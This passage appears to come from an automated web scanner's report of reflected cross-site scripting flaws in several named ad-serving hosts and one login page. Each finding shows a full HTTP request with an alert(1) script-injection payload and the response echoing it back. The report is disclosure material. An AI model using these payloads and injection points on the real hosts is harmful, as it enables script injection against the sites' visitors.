Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C4=; u2=8023169f-8dce-4de3-84d7-d5a4468633313HG09g; eyeblaster=FLV=10.2154&RES=128&WMPV=0; A3=iQQIaFx503Dk00000iZLfaFB607pd00001j4HbaE.a0a9y00001eDVwaDPh084o00001jcM0aFSa04m400000gY2paFS+09nl00003hH4jaFhv09wy00001jmnFaEUX09SF00002hEI2aE.a09B400001jcL+aFTt04m400000johvaFxN07uh00002i54CaFsN09MT00000hUDyaFGt0cbS00001eDVtaDP.084o00001j2fVaFWg07aw00001jeoLaF6J07Hs00001j8QYaEBz07LU00001hUBuaFGt0cbS00001igT+aFh30cXt000019rW0aFGt04uw00001iBU1aEBz0aVU00001; B3=7.Wt0000000001ui8Dka0000000001uh9cTR0000000001uf52BU0000000001ui9abz0000000000ui9eB50000000001uj8TfJ0000000001uh93M20000000001uf9kkO0000000000uj8OuK0000000000ui9kkN0000000000uj78Oj0000000001ud9qqo0000000002ui9gdG0000000001uh78O70000000001ud9pRI0000000002ug8z+.0000000001uh9iae0000000001uh80Dr0000000003uj99y10000000001ui7.Ws0000000001ui

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=iQQIaFx503Dk00000iZLfaFB607pd00001j4HbaE.a0a9y00001jcM0aFSa04m400000eDVwaDPh084o00001j2VeaGye07aw00001gY2paFS+09nl00003hH4jaFhv09wy00001jcL+aFTt04m400000hEI2aE.a09B400001jmnFaEUX09SF00002johvaFxN07uh00002hUDyaFGt0cbS00001i54CaFsN09MT00000eDVtaDP.084o00001jeoLaF6J07Hs00001j2fVaFWf07aw00001j8QYaEBz07LU00001igT+aFh30cXt00001hUBuaFGt0cbS00001iBU1aEBz0aVU000019rW0aFGt04uw00001; expires=Mon, 25-Jul-2011 10:22:38 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=7.Wt0000000001ui9cTR0000000001uf8Dka0000000001uh9abz0000000000ui52BU0000000001ui9fJa0000000001ul8TfJ0000000001uh9eB50000000001uj93M20000000001uf9kkO0000000000uj8OuK0000000000ui9kkN0000000000uj78Oj0000000001ud9qqo0000000002ui78O70000000001ud9gdG0000000001uh8z+.0000000001uh9pRI0000000002ug9iae0000000001uh7.Ws0000000001ui99y10000000001ui80Dr0000000003uj; expires=Mon, 25-Jul-2011 10:22:38 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Tue, 26 Apr 2011 14:22:38 GMT
Connection: close
Content-Length: 3364

<HTML><Body><Script>/*1*/var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=e
...[SNIP]...
2fd3b1a46a79&ll=0&hbll=0&id=FCBEC610ABA64BC3BAF092D3EB42D7C0&idh=e18a41658ec9c9c740dc1b91edbc4646&pvu=59196390591647FA9372FACB8C10DBA5&pvm=35e167e1c66fee62be98fe397190a726&uf=0&ur=0&llip=0&ttv=1&redir=1b413'><script>alert(1)</script>4a29843458ahttp%3a//bs.serving%2dsys.com/BurstingPipe/BannerRedirect.bs?cn=brd%26FlightID=2423626%26Page=%26PluID=0%26EyeblasterID=4992590%26Pos=40659133448784%26ord=%5btimestamp%5d' target='_blank'>
...[SNIP]...

4.16. http://bs.serving-sys.com/BurstingPipe/adServer.bs [ncu parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the ncu request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f0f14</script><script>alert(1)</script>21c15be81c4 was submitted in the ncu parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2423626&PluID=0&w=300&h=250&ord=20110426142246&ifrm=2&ncu=http%3A%2F%2Fspamlaws.us.intellitxt.com%2Fal.asp%3Fts%3D20110426142113%26at%3D39%26ipid%3D10143%26di%3D31742909%26syid%3D0%26adid%3D0%26pid%3D2%26cc%3Dus%26rcc%3Dus%26mh%3Db5e073b8ec12fc1181fc2fd3b1a46a79%26ll%3D0%26hbll%3D0%26id%3DFCBEC610ABA64BC3BAF092D3EB42D7C0%26idh%3De18a41658ec9c9c740dc1b91edbc4646%26pvu%3D59196390591647FA9372FACB8C10DBA5%26pvm%3D35e167e1c66fee62be98fe397190a726%26uf%3D0%26ur%3D0%26llip%3D0%26ttv%3D1%26redir%3Df0f14</script><script>alert(1)</script>21c15be81c4 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.spamlaws.com/spam-blocker.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C4=; u2=8023169f-8dce-4de3-84d7-d5a4468633313HG09g; eyeblaster=FLV=10.2154&RES=128&WMPV=0; A3=iQQIaFx503Dk00000iZLfaFB607pd00001j4HbaE.a0a9y00001eDVwaDPh084o00001jcM0aFSa04m400000gY2paFS+09nl00003hH4jaFhv09wy00001jmnFaEUX09SF00002hEI2aE.a09B400001jcL+aFTt04m400000johvaFxN07uh00002i54CaFsN09MT00000hUDyaFGt0cbS00001eDVtaDP.084o00001j2fVaFWg07aw00001jeoLaF6J07Hs00001j8QYaEBz07LU00001hUBuaFGt0cbS00001igT+aFh30cXt000019rW0aFGt04uw00001iBU1aEBz0aVU00001; B3=7.Wt0000000001ui8Dka0000000001uh9cTR0000000001uf52BU0000000001ui9abz0000000000ui9eB50000000001uj8TfJ0000000001uh93M20000000001uf9kkO0000000000uj8OuK0000000000ui9kkN0000000000uj78Oj0000000001ud9qqo0000000002ui9gdG0000000001uh78O70000000001ud9pRI0000000002ug8z+.0000000001uh9iae0000000001uh80Dr0000000003uj99y10000000001ui7.Ws0000000001ui

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=iQQIaFx503Dk00000iZLfaFB607pd00001j4HbaE.a0a9y00001jcM0aFSa04m400000eDVwaDPh084o00001j2VeaGye07aw00001gY2paFS+09nl00003hH4jaFhv09wy00001jcL+aFTt04m400000hEI2aE.a09B400001jmnFaEUX09SF00002johvaFxN07uh00002hUDyaFGt0cbS00001i54CaFsN09MT00000eDVtaDP.084o00001jeoLaF6J07Hs00001j2fVaFWf07aw00001j8QYaEBz07LU00001igT+aFh30cXt00001hUBuaFGt0cbS00001iBU1aEBz0aVU000019rW0aFGt04uw00001; expires=Mon, 25-Jul-2011 10:22:39 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=7.Wt0000000001ui9cTR0000000001uf8Dka0000000001uh9abz0000000000ui52BU0000000001ui9fJa0000000001ul8TfJ0000000001uh9eB50000000001uj93M20000000001uf9kkO0000000000uj8OuK0000000000ui9kkN0000000000uj78Oj0000000001ud9qqo0000000002ui78O70000000001ud9gdG0000000001uh8z+.0000000001uh9pRI0000000002ug9iae0000000001uh7.Ws0000000001ui99y10000000001ui80Dr0000000003uj; expires=Mon, 25-Jul-2011 10:22:39 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Tue, 26 Apr 2011 14:22:38 GMT
Connection: close
Content-Length: 3385

<HTML><Body><Script>/*1*/var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=e
...[SNIP]...
2fd3b1a46a79&ll=0&hbll=0&id=FCBEC610ABA64BC3BAF092D3EB42D7C0&idh=e18a41658ec9c9c740dc1b91edbc4646&pvu=59196390591647FA9372FACB8C10DBA5&pvm=35e167e1c66fee62be98fe397190a726&uf=0&ur=0&llip=0&ttv=1&redir=f0f14</script><script>alert(1)</script>21c15be81c4";ebO.fru="http://spamlaws.us.intellitxt.com/al.asp?ts=20110426142113&at=39&ipid=10143&di=31742909&syid=0&adid=0&pid=2&cc=us&rcc=us&mh=b5e073b8ec12fc1181fc2fd3b1a46a79&ll=0&hbll=0&id=FCBEC610ABA64BC3BA
...[SNIP]...

4.17. http://ds.addthis.com/red/psi/sites/www.comodo.com/p.json [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.comodo.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload cfd8a<script>alert(1)</script>72f799469a8 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.comodo.com/p.json?callback=_ate.ad.hprcfd8a<script>alert(1)</script>72f799469a8&uid=4dab4fa85facd099&url=http%3A%2F%2Fwww.comodo.com%2Fbusiness-security%2Fpci-compliance%2Fpci-scan.php&scb19p HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh39.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; psc=4; di=1303662902.60|1303662902.1OD|1303662902.1FE; dt=X; uid=4dab4fa85facd099

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 388
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Mon, 25 Apr 2011 23:45:35 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Wed, 25 May 2011 23:45:35 GMT; Path=/
Set-Cookie: di=%7B%7D..1303775135.1FE|1303775135.60; Domain=.addthis.com; Expires=Wed, 24-Apr-2013 15:09:02 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Mon, 25 Apr 2011 23:45:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 25 Apr 2011 23:45:35 GMT
Connection: close

_ate.ad.hprcfd8a<script>alert(1)</script>72f799469a8({"urls":["http://pixel.33across.com/ps/?pid=454&uid=4dab4fa85facd099","http://cspix.media6degrees.com/orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4dab4fa85facd099&curl=http%3a%2f%2fwww.comodo.
...[SNIP]...

4.18. http://event.adxpose.com/event.flow [uid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://event.adxpose.com
Path:   /event.flow

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 89d32<script>alert(1)</script>427b70698ad was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-5253809430940410%26output%3Dhtml%26h%3D600%26slotname%3D1644788465%26w%3D120%26lmt%3D1303845665%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fwww.spamlaws.com%252Fspam-blocker.html%26dt%3D1303827665898%26bpp%3D8%26shv%3Dr20110420%26jsv%3Dr20110415%26prev_slotnames%3D8319948044%252C1020003104%252C9565114904%252C0023118579%26correlator%3D1303827663964%26frm%3D0%26adk%3D222637912%26ga_vid%3D902403751.1303827664%26ga_sid%3D1303827664%26ga_hid%3D1845423620%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D1%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D965%26bih%3D956%26fu%3D0%26ifi%3D5%26dtd%3D13%26xpc%3DgvNjmv27ZD%26p%3Dhttp%253A%2F%2Fwww.spamlaws.com&uid=ZC45X9Axu6NOUFfX_28966789d32<script>alert(1)</script>427b70698ad&xy=0%2C0&wh=120%2C600&vchannel=69114&cid=166308&iad=1303827681130-85943930735811580&cookieenabled=1&screenwh=1920%2C1200&adwh=120%2C600&colordepth=16&flash=10.2&iframed=1 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-5253809430940410&output=html&h=600&slotname=1644788465&w=120&lmt=1303845665&flash=10.2.154&url=http%3A%2F%2Fwww.spamlaws.com%2Fspam-blocker.html&dt=1303827665898&bpp=8&shv=r20110420&jsv=r20110415&prev_slotnames=8319948044%2C1020003104%2C9565114904%2C0023118579&correlator=1303827663964&frm=0&adk=222637912&ga_vid=902403751.1303827664&ga_sid=1303827664&ga_hid=1845423620&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=965&bih=956&fu=0&ifi=5&dtd=13&xpc=gvNjmv27ZD&p=http%3A//www.spamlaws.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=8046e9fe-2ba6-4040-b3b9-5d1af9c46888

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=553DB0EC1C4D0E488AA95BECE444E49E; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 145
Date: Tue, 26 Apr 2011 14:21:21 GMT
Connection: close

if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("ZC45X9Axu6NOUFfX_28966789d32<script>alert(1)</script>427b70698ad");

4.19. http://ib.adnxs.com/ab [cnd parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The value of the cnd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dd50a'-alert(1)-'5ee4841495 was submitted in the cnd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ab?enc=pHA9CtcjE0CkcD0K1yMTQBLaci7FlQBApHA9CtcjE0CkcD0K1yMTQFUcOaKahDtdSsYda6b2ziXJ1LZNAAAAAEQwAAC1AAAAlgIAAAIAAADEpAIA0WMAAAEAAABVU0QAVVNEAHgAWAJhDE0AAg0BAgUCAAQAAAAAcx9FGwAAAAA.&tt_code=vert-314&udj=uf%28%27a%27%2C+9797%2C+1303827657%29%3Buf%28%27c%27%2C+52368%2C+1303827657%29%3Buf%28%27r%27%2C+173252%2C+1303827657%29%3Bppv%288991%2C+%276718109068834708565%27%2C+1303827657%2C+1303870857%2C+52368%2C+25553%29%3B&cnd=!uA56ZAiQmQMQxMkKGAAg0ccBKE0xMzMzEdcjE0BCCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABY4RhgAGiWBQ..dd50a'-alert(1)-'5ee4841495&referrer=http://www.spamlaws.com/spam-blocker.html&pp=TbbUyQAERXEK7FrIESl1USKqAlzx_1NgCAINaw&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBOnjTydS2TfGKEci1sQfR6qWJAdfq-NMBp5-U7Bjrwu3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi01MjUzODA5NDMwOTQwNDEwoAHD8v3sA7IBEHd3dy5zcGFtbGF3cy5jb226AQoxMjB4NjAwX2FzyAEJ2gEpaHR0cDovL3d3dy5zcGFtbGF3cy5jb20vc3BhbS1ibG9ja2VyLmh0bWyYAsobwAIEyAKF0s8KqAMB6AO6AugDigP1AwAAAMSABrqkhf7K9qWnTw%26num%3D1%26sig%3DAGiWqtyey6ImO1eOpu-MUOoG2tgmoZ9VPg%26client%3Dca-pub-5253809430940410%26adurl%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-5253809430940410&output=html&h=600&slotname=1644788465&w=120&lmt=1303845665&flash=10.2.154&url=http%3A%2F%2Fwww.spamlaws.com%2Fspam-blocker.html&dt=1303827665898&bpp=8&shv=r20110420&jsv=r20110415&prev_slotnames=8319948044%2C1020003104%2C9565114904%2C0023118579&correlator=1303827663964&frm=0&adk=222637912&ga_vid=902403751.1303827664&ga_sid=1303827664&ga_hid=1845423620&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=965&bih=956&fu=0&ifi=5&dtd=13&xpc=gvNjmv27ZD&p=http%3A//www.spamlaws.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIm4sBEAoYASABKAEwhY7L7QQQhY7L7QQYAA..; uuid2=2724386019227846218; anj=Kfu=8fG2<rgj[2<?0P(*AuB-u**g1:XIBUIEhzW()U9M1V)`B-9_(ygo7z0v4(^Nf$5@f1epA2Sw6La@%rmg/R-$1/uc>#?+!_/VvS?PF*yU-C4_rx!NEq)w+(RJbbKYr/.fmNX[=5u*'fkg>GB`St%p.uU(f#6kDukULq8/6Chj_YZn-BImfAMpaUTmN7*joV9bN)jmf5I]snH/]xnzH[iw%qgjwh>p+^cZz<R-eMV?4^a>]$!X9^RDTuLuZpK9=dIc/-`$T$goi.=oVzyWz'.(.XYco!RC'>1Qx(W`nwzUj?YH[J$3nv-KK#-iL$QJfrZbdN+(BosBCiJ'm<TIMEqIboyNV)q=Qp[*@Cf#8I-v%(BIP1j2)__HclCm<*N6uMz?9EChIE6Heba3v9eO'3D=f6?$k1DsLHwO4.ddbEp]y:s8ZIDamDmL[vt]Y?BqbrQnoc@iD:G@#d1R07d]E9#M:?dTed^`/$a<!%MSD0+[NQkt?PxChdO7dL8Xcmrl6eV=s'xP'kk61c7qYk; sess=1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 27-Apr-2011 14:21:39 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Mon, 25-Jul-2011 14:21:39 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Mon, 25-Jul-2011 14:21:39 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG4S]gj[2<?0P(*AuB-u**g1:XIF9]EhzW()U9M1V)`B-9_(ygo7z0v4(^Nf$5@f1epA2Sw6La@%rmg/R-$1/uc>#?+!_/VvS?PF*yU-C4_rx!NEq)w+(RJbbKYr/.fmNX[=5u*'fkg>GB`St%p.uU(f#6kDukULq8/6Chj_YZn-BImfAMpaUTmN7*joV9bN)jmf5I]snH/]xnzH[iw%qgjwh>p+^cZz<R-eMV?4^a>]$!X9^RDTuLuZpK9=dIc/-`$T$goi.=oVzyWz'.(.XYco!RC'>1Qx(W`nwzUj?YH[J$3nv-KK#-iL$QJfrZbdN+(Bo3KgX#`c5]qvg^lIg`K'/jYd`<2[cP$Mn.k).`o#?[DvFCmKS]_Rn]AnwyPLgc8R]HmkeLCt7wt+CdMJIY(Q8dnxZw!E9DDGh)[$QnR%ndJcRbu@?$Pk*eA85bgvgm.WQEeO/56q?$4$_+(]sS//QhH(L+o:.t`@]S2kvs7O@m7UZqq?WyPmfoNWxM!.CjYr2V.i; path=/; expires=Mon, 25-Jul-2011 14:21:39 GMT; domain=.adnxs.com; HttpOnly
Date: Tue, 26 Apr 2011 14:21:39 GMT
Content-Length: 1587

document.write('<scr' + 'ipt language=\"Javascript\"><!--\n amgdgt_p=\"5112\";\n amgdgt_pl=\"bb9cfe77\"; \n amgdgt_t = \"i\";\n amgdgt_clkurl = \"http://ib.adnxs.com/click/PQrXo3A9DEA9CtejcD0MQBLa
...[SNIP]...
EQwAAC1AAAAlgIAAAIAAADEpAIA0WMAAAEAAABVU0QAVVNEAHgAWAJhDE0AAg0BAgUCAAQAAAAAlx8LKgAAAAA./cnd=!uA56ZAiQmQMQxMkKGAAg0ccBKE0xMzMzEdcjE0BCCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABY4RhgAGiWBQ..dd50a'-alert(1)-'5ee4841495/referrer=http%3A%2F%2Fwww.spamlaws.com%2Fspam-blocker.html/clickenc=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBOnjTydS2TfGKEci1sQfR6qWJAdfq-NMBp5-U7Bjrwu3UHAAQARgBIAA4AVCAx-HEBGD
...[SNIP]...

4.20. http://ib.adnxs.com/ptj [redir parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The value of the redir request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 117b1'%3balert(1)//a202ffbf5ef was submitted in the redir parameter. This input was echoed as 117b1';alert(1)//a202ffbf5ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ptj?member=541&size=728x90&inv_code=1712152&referrer=http://www.nuclearpesticide.com/%3Fepl=GWxgAxA73QxrLsd2C6qmPnS3ZN9CQuEUyV38MxNtdDzbPO8DkWEHRIZAwJEDpKPH-fRZWF7ASJjVMurhyobiRLm-kN1iK6-u1SwKVBQvmQiJThLEwAFhK8C7kmCnqgZgRKGT6s5H2tSm7aABlEc9EG3U5CmC9DSATFOjTU2bhiJ0ACAQ3ue_AADgfwUAAECAWwkAAN0t2bdZUyZZQTE2aFpChgAAAPA&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dad%26ad_size%3D728x90%26section%3D1712152117b1'%3balert(1)//a202ffbf5ef HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.nuclearpesticide.com/?epl=GWxgAxA73QxrLsd2C6qmPnS3ZN9CQuEUyV38MxNtdDzbPO8DkWEHRIZAwJEDpKPH-fRZWF7ASJjVMurhyobiRLm-kN1iK6-u1SwKVBQvmQiJThLEwAFhK8C7kmCnqgZgRKGT6s5H2tSm7aABlEc9EG3U5CmC9DSATFOjTU2bhiJ0ACAQ3ue_AADgfwUAAECAWwkAAN0t2bdZUyZZQTE2aFpChgAAAPA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIm4sBEAoYASABKAEwhY7L7QQQhY7L7QQYAA..; uuid2=2724386019227846218; anj=Kfu=8fG2<rgj[2<?0P(*AuB-u**g1:XIBUIEhzW()U9M1V)`B-9_(ygo7z0v4(^Nf$5@f1epA2Sw6La@%rmg/R-$1/uc>#?+!_/VvS?PF*yU-C4_rx!NEq)w+(RJbbKYr/.fmNX[=5u*'fkg>GB`St%p.uU(f#6kDukULq8/6Chj_YZn-BImfAMpaUTmN7*joV9bN)jmf5I]snH/]xnzH[iw%qgjwh>p+^cZz<R-eMV?4^a>]$!X9^RDTuLuZpK9=dIc/-`$T$goi.=oVzyWz'.(.XYco!RC'>1Qx(W`nwzUj?YH[J$3nv-KK#-iL$QJfrZbdN+(BosBCiJ'm<TIMEqIboyNV)q=Qp[*@Cf#8I-v%(BIP1j2)__HclCm<*N6uMz?9EChIE6Heba3v9eO'3D=f6?$k1DsLHwO4.ddbEp]y:s8ZIDamDmL[vt]Y?BqbrQnoc@iD:G@#d1R07d]E9#M:?dTed^`/$a<!%MSD0+[NQkt?PxChdO7dL8Xcmrl6eV=s'xP'kk61c7qYk; sess=1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 27-Apr-2011 13:46:35 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Mon, 25-Jul-2011 13:46:35 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Mon, 25-Jul-2011 13:46:35 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChII3I4BEAoYASABKAEwu5nb7QQQu5nb7QQYAA..; path=/; expires=Mon, 25-Jul-2011 13:46:35 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb878257=-@L6DkI/7Z(hw'8[[6$!u[Y)C?enc=amlp6fDwAEAAAADAzMz8PwAAAMDMzPw_Es64uq1-E0DZW8r5Yu8WQDnocxW7-iJ5SsYda6b2ziW7zLZNAAAAAMVYAwAdAgAAlgIAAAIAAADIpAIAk8AAAAEAAABVU0QAVVNEANgCWgBWHwAATg8BAgUCAAUAAAAADCdr_gAAAAA.&tt_code=1712152&udj=uf%28%27a%27%2C+9797%2C+1303825615%29%3Buf%28%27c%27%2C+52368%2C+1303825615%29%3Buf%28%27r%27%2C+173256%2C+1303825615%29%3Bppv%288991%2C+%278728814709223188537%27%2C+1303825615%2C+1303868815%2C+52368%2C+49299%29%3B&cnd=!cBNCYQiQmQMQyMkKGAAgk4EDKAAxUUxr4mLvFkBCDggAELWn6QEYoQEgASgFQgwIn0YQuCEYAiADKAFCCwifRhAAGAAgAigBSANQAFjWPmAAaJYF; path=/; expires=Wed, 27-Apr-2011 13:46:35 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Mon, 25-Jul-2011 13:46:35 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG2<rgj[2<?0P(*AuB-u**g1:XIBUIEhzW()U9M1V)`B-9_(ygo7z0v4(^Nf$5@f1epA2Sw6La@%rmg/R-$1/uc>#?+!_/VvS?PF*yU-C4_rx!NEq)w+(RJbbKYr/.fmNX[=5u*'fkg>GB`St%p.uU(f#6kDukULq8/6Chj_YZn-BImfAMpaUTmN7*joV9bN)jmf5I]snH/]xnzH[iw%qgjwh>p+^cZz<R-eMV?4^a>]$!X9^RDTuLuZpK9=dIc/-`$T$goi.=oVzyWz'.(.XYco!RC'>1Qx(W`nwzUj?YH[J$3nv-KK#-iL$QJfrZbdN+(BosBCiJ'm<TIMEqIboyNV)q=Qp[*@Cf#8I-v%(BIP1j2)__HclCm<*N6uMz?9EChIE6Heba3v9eO'3D=f6?$k1DsLHwO4.ddbEp]y:s8ZIDamDmL[vt]Y?BqbrQnoc@iD:G@#d1R07d]E9#M:?dTed^`/$a<!%MSD0+[NQkt?PxChdO7dL8Xcmrl6eV=s'xP'kk61c7qYk; path=/; expires=Mon, 25-Jul-2011 13:46:35 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Tue, 26 Apr 2011 13:46:35 GMT
Content-Length: 195

document.write('<scr'+'ipt type="text/javascript"src="http://ad.yieldmanager.com/st?anmember=541&anprice=170&ad_type=ad&ad_size=728x90&section=1712152117b1';alert(1)//a202ffbf5ef"></scr'+'ipt>');

4.21. http://login.sisna.com/login_multiple/ [%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000344)%3C/script%3E parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://login.sisna.com
Path:   /login_multiple/

Issue detail

The value of the %27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000344)%3C/script%3E request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d08e3"><script>alert(1)</script>82ebadbbe5e was submitted in the %27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000344)%3C/script%3E parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

